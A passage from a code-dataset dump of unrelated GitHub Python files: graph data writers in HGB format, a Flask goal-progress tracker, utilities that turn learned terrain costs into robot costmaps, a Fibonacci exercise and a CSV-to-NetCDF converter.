columnTable.text\n\nprint(address)\n","repo_name":"NataliNascimento/PythonAutomation","sub_path":"ExtractCep2.py","file_name":"ExtractCep2.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24598074305","text":"# Module with classes and functions for outputting of graph data sets in the HBG format.\n# See https://www.biendata.xyz/hgb/#/about\n\nimport os\nimport pandas\nimport modules.node as node\n\n\norder_types_by = 'config' # Choose config or node\n\n# Write out an info.dat file at the specified path\n# Per https://www.biendata.xyz/hgb/#/about:\n# info.dat: The information of node labels. Each line has (node_id, node_type_id, node_label).\n# For multi-label setting, node_labels are split by comma.\ndef write_info_dat(path, config, node_list):\n file_name = os.path.join(path, 'info.dat')\n f = open(file_name, 'w')\n print(\"\\t\".join(['TYPE', 'NAME', 'LABELS']), file=f)\n if order_types_by == 'node':\n for key, item in node.List.type_map(node_list).items():\n print(item['id'], \"\\t\", key, ','.join(item['labels']), file=f)\n else:\n id = 0\n label_dict = node.TypeInfo(config).label_dict()\n for key in label_dict:\n print(id, \"\\t\", key, ','.join(label_dict[key]), file=f)\n id = id + 1\n f.close()\n\n\n# Write out a node.dat file at the specified path using data from the specified array index\n# Per https://www.biendata.xyz/hgb/#/about:\n# node.dat:The information of nodes. Each line has (node_id, node_name, node_type_id, node_feature).\n# Node features are vectors split by comma.\ndef write_node_dat(path, node_list, index):\n type_map = node.List.type_map(node_list)\n file_name = os.path.join(path, 'node.dat')\n f = open(file_name, 'w')\n print(\"\\t\".join(['NODE', 'NAME', 'TYPE', 'VALUES']), file=f)\n for item in node_list:\n print(item, \"\\t\", type_map[item.type_name]['id'], \"\\t\", ','.join(item.attribute_values(index)), file=f)\n f.close()\n\n\n# Write out a link.dat file at the specified path using data from the specified array index\n# Per https://www.biendata.xyz/hgb/#/about:\n# link.dat: The information of edges. Each line has (node_id_source, node_id_target, edge_type_id, edge_weight).\n# TODO implement node weighting\ndef write_link_dat(path, node_list, distance=1):\n file_name = os.path.join(path, 'link.dat')\n f = open(file_name, 'w')\n print(\"\\t\".join(['START', 'END', 'LINK_TYPE', 'LINK_WEIGHT']), file=f)\n for item in node_list:\n if (isinstance(item, node.SetPointNode)):\n for target in item.extended_links(distance):\n # Hard-code type and weight for now\n print(item.node_id, '\\t', target.node_id, '\\t', '0\\t1', file=f)\n f.close()\n\n\n# Write out a meta.dat file at the specified path\n# The file contains summary data such as the number of each type of node\ndef write_meta_dat(path, config, node_list):\n type_map = node.List.type_map(node_list)\n file_name = os.path.join(path, 'meta.dat')\n f = open(file_name, 'w')\n print('Total Nodes:', \"\\t\", len(node_list), file=f)\n if order_types_by == 'node':\n for type_name, data in type_map.items():\n print(f\"Node_Type_{data['id']}:\", \"\\t\", data['count'], file=f)\n else:\n id = 0\n label_dict = node.TypeInfo(config).label_dict()\n for key in label_dict:\n if key in type_map:\n data = type_map[key]\n else:\n data = {'count' : 0}\n print(f\"Node_Type_{id}:\", \"\\t\", data['count'], file=f)\n id = id + 1\n f.close()\n\n\n# Return a path tree of Base/Year/Month/Day/Hour using the correct path separator for the current OS\n# If requested, the path can also include minutes and seconds subdirectories.\ndef path_from_date(base_path, target_date, minutes=False, seconds=False):\n date = pandas.to_datetime(target_date)\n path = os.path.join(base_path, date.strftime(\"%Y\"), date.strftime(\"%m\"), date.strftime(\"%d\"), date.strftime(\"%H\"))\n if minutes or seconds:\n path = os.path.join(path, date.strftime(\"%M\"))\n if seconds:\n path = os.path.join(path, date.strftime(\"%S\"))\n return path\n\n\ndef dir_from_date(base_path, target_date):\n date = pandas.to_datetime(target_date)\n dir = date.strftime(\"%Y\") + date.strftime(\"%m\") + date.strftime(\"%d\") + \\\n '_' + date.strftime(\"%H\") + date.strftime(\"%M\") + date.strftime(\"%S\")\n path = os.path.join(base_path, dir)\n return path\n\n\n\n\n\n","repo_name":"JeffersonLab/ced2graph","sub_path":"modules/hgb.py","file_name":"hgb.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28707571036","text":"from flask import (\n Blueprint,\n current_app,\n g,\n redirect,\n render_template,\n request,\n url_for,\n)\n\nfrom flask_table import create_table, Table, Col\n\nfrom lifetracker.auth import login_required\nfrom lifetracker.db import get_db\nfrom lifetracker.goals import fetch_goals\n\nbp = Blueprint(\"progress\", __name__)\n\n\nclass ProgressTable(Table):\n name = Col(\"Goal\")\n description = Col(\"Description\")\n\n\ndef get_recent_progress_by_goal(goal_id, dates, offset=0, check_author=True):\n \"\"\"\n Get recent progress for a goal over a set number of dates.\n\n : param limit: number of dates to return\n : param offset: page to display (paginiation)\n : return: a table with columns as dates and goals as rows\n \"\"\"\n sql_query = (\n \"SELECT p.id AS progress_id, hours, goal_id, date(p.created) AS \"\n + \" date, g.title\"\n + \" FROM progress p JOIN user u ON p.author_id = u.id\"\n + \" JOIN goals g ON p.goal_id = g.id\"\n + \" WHERE u.id = ? AND p.goal_id = ? AND date IN (%s)\"\n % \",\".join(\"?\" * len(dates))\n )\n arguments = (g.user[\"id\"], goal_id) + tuple(dates)\n progress = get_db().execute(sql_query, arguments).fetchall()\n if progress is None:\n return None\n else:\n return progress\n\n\ndef fetch_progress_dates(limit, offset=0, check_author=True):\n \"\"\"\n Get the recent dates during which progress has been written.\n\n :param limit: number of results to return\n :param offset: which page of results to display\n :return: the past progress dates as a list\n\n \"\"\"\n progress_dates = (\n get_db()\n .execute(\n \"SELECT DISTINCT DATE(created) as date, author_id\"\n \" FROM progress p JOIN user u ON p.author_id = u.id\"\n \" WHERE u.id = ?\"\n \" ORDER BY date DESC\"\n \" LIMIT ?\",\n (g.user[\"id\"], limit),\n )\n .fetchall()\n )\n return [row[\"date\"] for row in progress_dates]\n\n\ndef progress_table():\n \"\"\"\n Assemble progress table fetching goals, then progress results by id.\n The assembled table is then returned.\n \"\"\"\n output = []\n limit = 5\n goals = fetch_goals()\n progress_dates = fetch_progress_dates(limit)\n TableCls = create_table(\"Progress\").add_column(\"Goal\", Col(\"Goal\"))\n # create table columns\n for row in progress_dates:\n TableCls.add_column(row, Col(row))\n\n for row in goals:\n goal_progress = get_recent_progress_by_goal(row[\"id\"], progress_dates, 5)\n if goal_progress is not None:\n # collate progress into a dictionary\n output_dictionary = {\"Goal\": goal_progress[0][\"title\"]}\n for row in goal_progress:\n output_dictionary[row[\"date\"]] = row[\"hours\"]\n # add remaining keys not found\n for row in progress_dates:\n if row not in output_dictionary.keys():\n output_dictionary[row] = None\n # append to output list\n output.append(output_dictionary)\n # build table\n table = TableCls(output, no_items=\"-\")\n return table\n\n\n@bp.route(\"/progress\", methods=(\"GET\",))\n@login_required\ndef index():\n \"\"\"\n Display progress for the last five days.\n \"\"\"\n # create a row based table based on the goal description and each date's\n # progress value for each goal\n # this includes a row for the headers: Goal, Date1, Date2 etc\n table = progress_table()\n return render_template(\"progress/index.html\", table=table)\n\n\n@bp.route(\"/progress/create\", methods=(\"GET\", \"POST\"))\n@login_required\ndef create():\n \"\"\"\n Progress can be added to any/all goal(s) displayed.\n \"\"\"\n goals = fetch_goals()\n if request.method == \"POST\":\n data_id = request.form.getlist(\"id\")\n data_progress = request.form.getlist(\"progress\")\n data_quality = request.form.getlist(\"grade\")\n data = {\n int(k): [int(v), int(s)]\n for k, v, s in zip(data_id, data_progress, data_quality)\n }\n db = get_db()\n for goal, data_poihts in data.items():\n db.execute(\n \"INSERT INTO progress (author_id, goal_id, hours, quality) \"\n \" VALUES (?, ?, ?, ?)\",\n (g.user[\"id\"], goal, data_poihts[0], data_poihts[1]),\n )\n db.commit()\n return redirect(url_for(\"progress.index\"))\n\n return render_template(\"progress/create.html\", goals=goals)\n","repo_name":"robotjandal/lifetracker","sub_path":"lifetracker/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20908959765","text":"from collections import OrderedDict\nimport numpy as np\nimport os\nimport torch\nfrom torchvision import transforms as T\nimport torch.nn as nn\nimport torch.optim as optim\nfrom learned_cost_map.trainer.model import CostModel\nfrom learned_cost_map.terrain_utils.terrain_map_tartandrive import TerrainMap\nfrom learned_cost_map.trainer.utils import get_dataloaders, get_balanced_dataloaders, preprocess_data, avg_dict, get_FFM_freqs, FourierFeatureMapping\n\nfrom math import ceil\nimport matplotlib.pyplot as plt\nimport time\n\n\nbgr_to_rgb = lambda img: img[[2,1,0],:,:] \n \ntransform_to_img = T.Compose([\n T.Normalize(mean = [0., 0., 0.], std = [1/0.229, 1/0.224, 1/0.225]),\n T.Normalize(mean = [-0.485, -0.456, -0.406], std = [1., 1., 1.]),\n T.Lambda(bgr_to_rgb),\n T.ToPILImage(),\n np.asarray\n])\n\n\ndef tensor_to_img(img_tensor):\n '''Converts a tensor representing an image into a numpy array that can be directly used for plotting purposes.\n\n Args:\n img_tensor:\n Tensor(C,H,W)->Float or Tensor(H,W)->Float representing image\n Returns:\n img_plot:\n Array(H,W,C)->Uint8 or Array(H,W)->Uint8 image ready to be plotted\n '''\n if img_tensor.shape[0] == 1 or len(img_tensor.shape) < 3:\n raise NotImplementedError\n\n img_plot = transform_to_img(img_tensor)\n\n return img_plot\n\ndef tensor_to_heightmap(heightmap_tensor):\n '''Converts a heightmap tensor into an array that can be directly used for plotting purposes.\n\n Args:\n heightmap_tensor:\n Tensor(C,H,W)->Float representing heightmap, where C=5 and corresponds to the following channels: min height, max height, mean height, std height, invalid mask. These maps are in the [0,1] range,and were normalized using values min=-2, max=2, and x_norm = x-min/(max-min).\n Returns:\n heightmap_array:\n Array(H,W,C)->Float heightmap, where C=2, and in this case correspond to the unnormalized min and max values for the heightmap.\n '''\n\n unnorm_height_map = 4*heightmap_tensor[:-1,] - 2\n # import pdb;pdb.set_trace()\n # nan_idx = torch.nonzero(heightmap_tensor[-1] == 1)\n # for channel in range(unnorm_height_map.shape[0]):\n # unnorm_height_map[channel][nan_idx] = torch.nan\n heightmap_array = unnorm_height_map[0:2].permute(1,2,0).detach().cpu().numpy()\n\n return heightmap_array\n\n\ndef patches_to_imgs(patches_tensor):\n '''Converts a tensor of map patches into two numpy arrays: One that contains the batched RGB data for each patch into a form that can be directly plotted if iterated over, and one that contains the batched heightmap information.\n\n Args:\n patches_tensor:\n Tensor(N, C, H, W)->Float representing N map patches, where N corresponds to the lookahead.\n Returns:\n rgb_maps:\n Array(N, H, W, C)->Uint8 containing RGB map information for each patch, where C=3\n height_maps:\n Array(N, H, W, C)->Float containing height map information for each patch, where C=2. TBD whether the two channel dimensions correspond to min/max or mean/std.\n '''\n if len(patches_tensor.shape) < 4:\n raise NotImplementedError\n\n # import pdb;pdb.set_trace()\n rgb_maps_tensor = patches_tensor[:,0:3, :, :]\n height_maps_tensor = patches_tensor[:, 3:, :, :]\n\n # Process rgb maps\n rgb_imgs = []\n for img in rgb_maps_tensor:\n rgb_img = transform_to_img(img)\n rgb_imgs.append(rgb_img)\n rgb_maps = np.stack(rgb_imgs, axis=0)\n\n # Process height maps\n # Remember: need to unnormalize\n height_maps = []\n for hm in height_maps_tensor:\n height_map = tensor_to_heightmap(hm)\n height_maps.append(height_map)\n height_maps = np.stack(height_maps, axis=0)\n\n return rgb_maps, height_maps\n\ndef process_invalid_patches(patches, thresh=0.5):\n '''Takes in a tensor of patches and returns a tensor of ones and zeros, with ones signaling an invalid patch so that the cost can be set appropriately.\n\n Args:\n - patches:\n Tensor of shape [B, C, H, W]\n \n Returns: \n - invalid:\n Tensor of shape [B]\n '''\n invalid_channels = patches[:, -1, :, :]\n invalid_vals = torch.sum(invalid_channels, dim=(1,2))/(patches.shape[-2]*patches.shape[-1])\n invalid_flags = invalid_vals > thresh\n\n return invalid_flags\n\ndef produce_costmap(model, maps, map_metadata, crop_params, costmap_batch_size=256, costmap_stride=20, vel=None, fourier_freqs=None):\n '''Returns a costmap using a trained model from a maps dict.\n\n Args:\n - model:\n nn.Module object, Torch model used for cost inference.\n - maps: \n A dictionary of maps (as would go into TerrainMap) defined as follows:\n {\n 'rgb_map': Tensor(C,H,W) where C=3 corresponding to RGB values,\n 'height_map': Tensor(C,H,W) where C=5 corresponding to min, max, mean, std, invalid_mask where 1's correspond to invalid cells\n }\n - map_metadata: \n Information about the map in metric space defined as follows: \n {\n 'height': map_height [m],\n 'width': map_width [m],\n 'resolution': resolution [m],\n 'origin': origin [m]\n }\n - crop_params:\n Dictionary containing information about the output crops \n {\n 'crop_size': [Float, Float] # size in meters of the patch to obtain below the robot,\n 'output_size': [Int, Int] # Size of output image in pixels\n }\n - vel:\n Float of unnormalized velocity at which we want to query the costmap. If name of the model is not CostVelModel or CostFourierVelModel, this should be None.\n - fourier_freqs:\n Tensor of fourier frequencies used in the CostFourierVelModel. If the name of the model is different, this should be None.\n \n Returns:\n - costmap:\n Tensor of dimensions as given by the map_metadata: (height/resolution, width/resolution) containing inferred costmap from learned model.\n '''\n\n print(f\"costmap_batch_size: {costmap_batch_size}, costmap_stride: {costmap_stride}\")\n # import pdb;pdb.set_trace()\n device = \"cuda\" # \"cuda\" if torch.cuda.is_available() else \"cpu\"\n tm = TerrainMap(maps=maps, map_metadata=map_metadata, device=device)\n\n\n # Get tensor of all map poses to be queried\n map_height = int(map_metadata['height']/map_metadata['resolution'])\n map_width = int(map_metadata['width']/map_metadata['resolution'])\n x_pixels = torch.arange(0, map_height, costmap_stride)\n y_pixels = torch.arange(0, map_width, costmap_stride)\n x_poses = x_pixels*map_metadata['resolution']+map_metadata[\"origin\"][0]\n y_poses = y_pixels*map_metadata['resolution']+map_metadata[\"origin\"][1]\n all_poses = torch.stack(torch.meshgrid(x_poses, y_poses, indexing=\"ij\"), dim=-1).view(-1, 2)\n # Append orientations\n all_poses = torch.cat([all_poses, torch.zeros(all_poses.shape[0], 1)], dim=-1).to(device).detach()\n\n num_cells = all_poses.shape[0]\n num_batches = ceil(num_cells/costmap_batch_size)\n batch_starts = [(k)*costmap_batch_size for k in range(num_batches)]\n batch_ends = [min(((k+1)*costmap_batch_size), num_cells) for k in range(num_batches)]\n\n all_costs = []\n # Query all map poses from TerrainMap\n # fig = plt.figure()\n # front_img_ax = fig.add_subplot(111)\n for b in range(num_batches):\n # if b % 100 == 0:\n # print(f\"Evaluating batch {b}/{num_batches}\")\n # import pdb;pdb.set_trace()\n patches = tm.get_crop_batch(poses=all_poses[batch_starts[b]:batch_ends[b]], crop_params=crop_params)\n # print(f\"Shape of patches: {patches.shape}\")\n invalid_flags = process_invalid_patches(patches, thresh=0.5)\n # rgb_maps, height_maps = patches_to_imgs(patches)\n # front_img_ax.clear() \n # front_img_ax.imshow(rgb_maps[0])\n # p = all_poses[batch_starts[b]:batch_ends[b]]\n # front_img_ax.set_title(f\"Element {b}. Looking at pose {p}\")\n # Pass all map patches to network\n # import pdb;pdb.set_trace()\n input_data = {}\n # import pdb;pdb.set_trace()\n input_data['patches'] = patches.cuda()\n if vel is not None:\n vels_vec = (torch.ones(patches.shape[0], 1) * vel/20.0).cuda()\n else:\n vels_vec = None\n if fourier_freqs is not None:\n fourier_freqs = fourier_freqs.cuda()\n fourier_vels = (FourierFeatureMapping(vels_vec, fourier_freqs)).cuda()\n else:\n fourier_vels = None\n input_data['vels'] = vels_vec\n input_data['fourier_vels'] = fourier_vels\n costs = model(input_data).detach()\n costs[invalid_flags] = 0.5 # TODO Uncomment this line if you want to set high costs to invalid areas\n # import pdb;pdb.set_trace()\n if len(costs.shape) > 1:\n costs = costs.squeeze()\n if len(costs.shape) < 1:\n costs = costs.view(-1)\n all_costs.append(costs)\n # plt.pause(0.1)\n \n all_costs = torch.cat(all_costs, 0)\n # Reshape cost predictions into costmap\n # import pdb;pdb.set_trace()\n reduced_costmap = all_costs.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n\n costmap = torch.nn.functional.interpolate(reduced_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n # costmap = reduced_costmap \n\n costmap = costmap.squeeze()\n \n # costmap = all_costs.view(map_height, map_width)\n costmap = costmap.cpu().numpy()\n\n return costmap\n\ndef produce_ensemble_costmap(model, maps, map_metadata, crop_params, costmap_batch_size=256, costmap_stride=20, vel=None, fourier_freqs=None):\n '''Returns a costmap using a trained model from a maps dict.\n\n Args:\n - model:\n nn.Module object, Torch model used for cost inference.\n - maps: \n A dictionary of maps (as would go into TerrainMap) defined as follows:\n {\n 'rgb_map': Tensor(C,H,W) where C=3 corresponding to RGB values,\n 'height_map': Tensor(C,H,W) where C=5 corresponding to min, max, mean, std, invalid_mask where 1's correspond to invalid cells\n }\n - map_metadata: \n Information about the map in metric space defined as follows: \n {\n 'height': map_height [m],\n 'width': map_width [m],\n 'resolution': resolution [m],\n 'origin': origin [m]\n }\n - crop_params:\n Dictionary containing information about the output crops \n {\n 'crop_size': [Float, Float] # size in meters of the patch to obtain below the robot,\n 'output_size': [Int, Int] # Size of output image in pixels\n }\n - vel:\n Float of unnormalized velocity at which we want to query the costmap. If name of the model is not CostVelModel or CostFourierVelModel, this should be None.\n - fourier_freqs:\n Tensor of fourier frequencies used in the CostFourierVelModel. If the name of the model is different, this should be None.\n \n Returns:\n - costmap:\n Tensor of dimensions as given by the map_metadata: (height/resolution, width/resolution) containing inferred costmap from learned model.\n '''\n print(\"\\n\\n\\n====\\nINSIDE ENSAMBLE PRODUCE COSTMAP\\n====\\n\\n\\n\")\n print(f\"costmap_batch_size: {costmap_batch_size}, costmap_stride: {costmap_stride}\")\n device = \"cuda\" # \"cuda\" if torch.cuda.is_available() else \"cpu\"\n tm = TerrainMap(maps=maps, map_metadata=map_metadata, device=device)\n\n\n # Get tensor of all map poses to be queried\n map_height = int(map_metadata['height']/map_metadata['resolution'])\n map_width = int(map_metadata['width']/map_metadata['resolution'])\n x_pixels = torch.arange(0, map_height, costmap_stride)\n y_pixels = torch.arange(0, map_width, costmap_stride)\n x_poses = x_pixels*map_metadata['resolution']+map_metadata[\"origin\"][0]\n y_poses = y_pixels*map_metadata['resolution']+map_metadata[\"origin\"][1]\n all_poses = torch.stack(torch.meshgrid(x_poses, y_poses, indexing=\"ij\"), dim=-1).view(-1, 2)\n # Append orientations\n all_poses = torch.cat([all_poses, torch.zeros(all_poses.shape[0], 1)], dim=-1).to(device).detach()\n\n num_cells = all_poses.shape[0]\n num_batches = ceil(num_cells/costmap_batch_size)\n batch_starts = [(k)*costmap_batch_size for k in range(num_batches)]\n batch_ends = [min(((k+1)*costmap_batch_size), num_cells) for k in range(num_batches)]\n\n all_costmaps = []\n\n all_map_vals = None\n all_invalid = None\n\n # Query all map poses from TerrainMap\n for b in range(num_batches):\n patches = tm.get_crop_batch(poses=all_poses[batch_starts[b]:batch_ends[b]], crop_params=crop_params)\n invalid_flags = process_invalid_patches(patches, thresh=0.5)\n\n # Get input to network\n input_data = {}\n input_data['patches'] = patches.cuda()\n if vel is not None:\n vels_vec = (torch.ones(patches.shape[0], 1) * vel/20.0).cuda()\n else:\n vels_vec = None\n if fourier_freqs is not None:\n fourier_freqs = fourier_freqs.cuda()\n fourier_vels = (FourierFeatureMapping(vels_vec, fourier_freqs)).cuda()\n else:\n fourier_vels = None\n input_data['vels'] = vels_vec\n input_data['fourier_vels'] = fourier_vels\n\n # Pass patches and vels through network\n costs = model(input_data)\n concat_costs = torch.cat(costs, axis=1)\n if all_map_vals is None:\n all_map_vals = concat_costs\n all_invalid = invalid_flags\n else:\n all_map_vals = torch.cat([all_map_vals, concat_costs])\n all_invalid = torch.cat([all_invalid, invalid_flags])\n \n # import pdb;pdb.set_trace()\n # costs[invalid_flags] = 0.5 # TODO Uncomment this line if you want to set high costs to invalid areas\n\n # if len(costs.shape) > 1:\n # costs = costs.squeeze()\n # if len(costs.shape) < 1:\n # costs = costs.view(-1)\n # all_costs.append(costs)\n # import pdb;pdb.set_trace()\n mean_cost = torch.mean(all_map_vals.detach(), axis=1)\n # mean_cost = all_map_vals[:,1].detach()\n std_cost = torch.std(all_map_vals.detach(), axis=1)\n \n # Handle invalid cells\n mean_cost[all_invalid] = 1.0\n\n # Reshape cost predictions into costmap\n reduced_mean_costmap = mean_cost.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n reduced_std_costmap = std_cost.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n\n mean_costmap = torch.nn.functional.interpolate(reduced_mean_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n std_costmap = torch.nn.functional.interpolate(reduced_std_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n\n mean_costmap = mean_costmap.squeeze().cpu().numpy()\n std_costmap = std_costmap.squeeze().cpu().numpy()\n\n for k in range(all_map_vals.shape[1]):\n costmap_vector = all_map_vals[:,k].detach()\n costmap_vector[all_invalid] = 1.0\n reduced_costmap = costmap_vector.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n costmap = torch.nn.functional.interpolate(reduced_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n costmap = costmap.squeeze().cpu().numpy()\n all_costmaps.append(costmap)\n\n return mean_costmap, std_costmap, all_costmaps\n\n\ndef rosmsgs_to_maps(rgbmap, heightmap):\n '''Converts input rgbmaps and heightmaps from numpy arrays incoming from ros msgs to tensors that can be passed into produce_costmap.\n\n Args:\n - rgbmap:\n HxWx3 Uint8 array containing rgbmap input from ros topic.\n - heightmap:\n HxWx4 Float array containing the following info about heightmap: min, max, mean, std.\n Returns:\n - maps:\n Dictionary containing two tensors:\n {\n 'rgb_map': Tensor(C,H,W) where C=3 corresponding to RGB values,\n 'height_map': Tensor(C,H,W) where C=5 corresponding to min, max, mean, std, invalid_mask where 1's correspond to invalid cells\n }\n '''\n ## First, convert rgbmap to tensor\n img_transform = T.Compose([\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n rgb_map_tensor = img_transform(rgbmap.astype(np.uint8))\n # Change axes so that map is aligned with robot-centric coordinates\n rgb_map_tensor = rgb_map_tensor.permute(0,2,1)\n\n ## Now, convert heightmap to tensor\n hm = torch.from_numpy(heightmap)\n hm_nan = torch.isnan(hm).any(dim=-1, keepdim=True) | (hm > 1e5).any(dim=-1, keepdim=True) | (hm < -1e5).any(dim=-1, keepdim=True)\n hm = torch.nan_to_num(hm, nan=0.0, posinf=2, neginf=-2)\n hm = torch.clamp(hm, min=-2, max=2)\n hm = (hm - (-2))/(2 - (-2))\n hm = torch.cat([hm, hm_nan], dim=-1)\n hm = hm.permute(2,0,1)\n height_map_tensor = hm.permute(0,2,1)\n\n maps = {\n 'rgb_map':rgb_map_tensor,\n 'height_map':height_map_tensor\n }\n\n return maps\n\n\ndef local_path_to_pixels(local_path, map_metadata):\n '''Returns the pixel locations of a local_path in the costmap.\n \n Args:\n - local_path:\n Nx3 array of local path obtained from odometry\n - map_metadata:\n Dictionary containing metadata for costmap. Has the following structure:\n {\n 'height': map_height [m],\n 'width': map_width [m],\n 'resolution': resolution [m],\n 'origin': origin [m]\n }\n '''\n\n x_positions = local_path[:,0]\n y_positions = local_path[:,1]\n\n x_pixels = ((x_positions - map_metadata[\"origin\"][0])/map_metadata[\"resolution\"]).long()\n y_pixels = ((y_positions - map_metadata[\"origin\"][1])/map_metadata[\"resolution\"]).long()\n\n return x_pixels, y_pixels\n","repo_name":"castacks/learned_cost_map","sub_path":"scripts/learned_cost_map/utils/costmap_utils.py","file_name":"costmap_utils.py","file_ext":"py","file_size_in_byte":18168,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"1118005679","text":"def print_fibonacci_sequence():\n\n sequence_controller = 0\n index = 0\n first_term = 1\n sum = 0\n\n number_of_sequence = int(input(\"Please enter a number and see the fibonacci sequence: \"))\n\n #A storage that holds the sum of the previous two numbers\n sum_storage = [1]\n print(f\"The first {number_of_sequence + 1} number of the fibonacci series is : {first_term}\", end=\" \")\n\n #Iterate the whole process by adding the current sum to the previous number in the list\n while(sequence_controller < number_of_sequence):\n sum += sum_storage[index - 1]\n print(sum, end=\" \")\n sum_storage.append(sum)\n sequence_controller+=1\n index+=1\n print(\"\\nThe nth number in the fibonnaci series is: \",sum)\n\nprint_fibonacci_sequence()\n","repo_name":"Sanusi1997/python_power_of_computing_exercises","sub_path":"functions/fibonnaci_sequence.py","file_name":"fibonnaci_sequence.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8736559249","text":"import datetime as dt\nimport pathlib as pl\nfrom typing import Union\n\nimport netCDF4 as nc4\nimport numpy as np\nimport pandas as pd\n\nfrom ..base import meta\n\nfileish = Union[str, pl.PosixPath, dict]\n\n\nclass CsvFile:\n \"\"\"CSV file object\n path: a string, pathlib.Path or dict. The key of the dict can be used\n to rename the variable in the recarray and upon output to Netcdf.\n The value of the dict should be a string or a pathlib.Path. Only\n dicts of len 1 are allowed currently.\n\n \"\"\"\n\n def __init__(\n self,\n path: fileish = None,\n convert: bool = False,\n ) -> \"CsvFile\":\n self.paths = {}\n if path is not None:\n self._add_path(path)\n self.convert = convert\n self._variables = None\n self._coordinates = None\n self._data = None\n self.meta = meta\n\n @property\n def nhm_id(self) -> list:\n \"\"\"Get a list of nhm ids\n\n Returns:\n nhm_ids: list of nhm ids\n\n \"\"\"\n self._lazy_data_evaluation()\n\n key = \"nhm_id\"\n if key in self._coordinates.keys():\n nhm_ids = self._coordinates[key]\n else:\n nhm_ids = None\n return nhm_ids\n\n @property\n def nhm_seg(self) -> list:\n \"\"\"Get a list of nhm segments\n\n Returns:\n nhm_segs: list of nhm segments\n\n \"\"\"\n self._lazy_data_evaluation()\n\n key = \"nhm_seg\"\n if key in self._coordinates.keys():\n nhm_segs = self._coordinates[key]\n else:\n nhm_segs = None\n return nhm_segs\n\n @property\n def variable_names(self) -> list:\n \"\"\"Get a list of unique variables\n\n Returns:\n variables: list of variables\n\n \"\"\"\n self._lazy_data_evaluation()\n return self._variables\n\n @property\n def data(self) -> np.recarray:\n \"\"\"Get csv output data as a numpy recarray\n\n Returns:\n data : numpy recarray containing all of the csv data\n\n \"\"\"\n self._lazy_data_evaluation()\n return self._data\n\n def add_path(\n self,\n path: fileish,\n ) -> None:\n \"\"\"Add a csv output file path to the object\n\n Args:\n name: path for csv output file\n\n Returns:\n None\n\n \"\"\"\n\n self._add_path(path)\n\n def to_dataframe(self) -> pd.DataFrame:\n \"\"\"Get the csv output data as a pandas dataframe\n\n Returns:\n df: csv output data as a pandas dataframe\n\n \"\"\"\n self._lazy_data_evaluation()\n df = pd.DataFrame(self._data).set_index(\"date\")\n return df\n\n def to_netcdf(\n self,\n name: fileish,\n global_atts: dict = None,\n clobber: bool = True,\n zlib: bool = True,\n complevel: int = 4,\n chunk_sizes: dict = {\"time\": 30, \"hruid\": 0},\n ) -> None:\n \"\"\"Output the csv output data to a netcdf file\n\n Args:\n name: path for netcdf output file\n clobber: boolean indicating if an existing netcdf file should\n be overwritten\n zlib: boolean indicating if the data should be compressed\n (default is True)\n complevel: compression level (default is 4)\n chunk_sizes: dictionary defining chunk sizes for the data\n\n Returns:\n None\n\n \"\"\"\n self._lazy_data_evaluation()\n\n ds = nc4.Dataset(name, \"w\", clobber=clobber)\n ds.setncattr(\"Description\", \"PRMS output data\")\n if global_atts is not None:\n for key, val in global_atts.items():\n ds.setncattr(key, val)\n\n # Dimensions\n # None for the len argument gives an unlimited dim\n ntimes = self._data.shape[0]\n ds.createDimension(\"time\", ntimes)\n for key, value in self._coordinates.items():\n ds.createDimension(key, len(value))\n\n # Dim Variables\n time = ds.createVariable(\"time\", \"f4\", (\"time\",))\n start_date = self._data[\"date\"][0].strftime(\"%Y-%m-%d %H:%M:%S\")\n time_units = f\"days since {start_date}\"\n time.units = time_units\n time[:] = nc4.date2num(\n self._data[\"date\"].astype(dt.datetime),\n units=time_units,\n calendar=\"standard\",\n )\n\n for key, value in self._coordinates.items():\n coord_id = ds.createVariable(key, \"i4\", (key))\n coord_id[:] = np.array(value, dtype=int)\n\n dimensions = self.meta.get_dimensions(self.variable_names)\n\n # Variables\n for variable_name in self.variable_names:\n if self.meta.is_available(variable_name):\n meta_dict = self.meta.find_variables(variable_name)\n variable_type = meta.meta_netcdf_type(meta_dict[variable_name])\n dimension = dimensions[variable_name]\n if \"nsegment\" in dimension:\n dim_name = \"nhm_seg\"\n else:\n dim_name = \"nhm_id\"\n dtype = meta.meta_numpy_type(meta_dict[variable_name])\n else:\n variable_type = \"f4\"\n dim_name = \"nhm_id\"\n dtype = np.float32\n\n ids = self._coordinates[dim_name]\n nids = len(ids)\n\n var = ds.createVariable(\n variable_name,\n variable_type,\n (\"time\", dim_name),\n fill_value=nc4.default_fillvals[variable_type], # JLM: sus\n zlib=zlib,\n complevel=complevel,\n chunksizes=tuple(chunk_sizes.values()),\n )\n # add additional meta data\n if self.meta.is_available(variable_name):\n var_meta = self.meta.find_variables(variable_name)[\n variable_name\n ]\n for key, val in var_meta.items():\n if isinstance(val, dict):\n continue\n ds.variables[variable_name].setncattr(key, val)\n\n arr = np.zeros((ntimes, nids), dtype=dtype)\n for idx, on_id in enumerate(ids):\n key = f\"{variable_name}_{on_id}\"\n arr[:, idx] = self._data[key][:]\n ds.variables[variable_name][:, :] = arr\n\n ds.close()\n print(f\"Wrote netcdf file: {name}\")\n return\n\n def _add_path(\n self,\n path: fileish,\n ):\n if isinstance(path, (str, pl.Path)):\n path = pl.Path(path)\n self.paths[path.stem] = path\n elif isinstance(path, dict):\n if len(path) > 1:\n raise ValueError(\"Only dicts of len 1 allowed currently\")\n for key, val 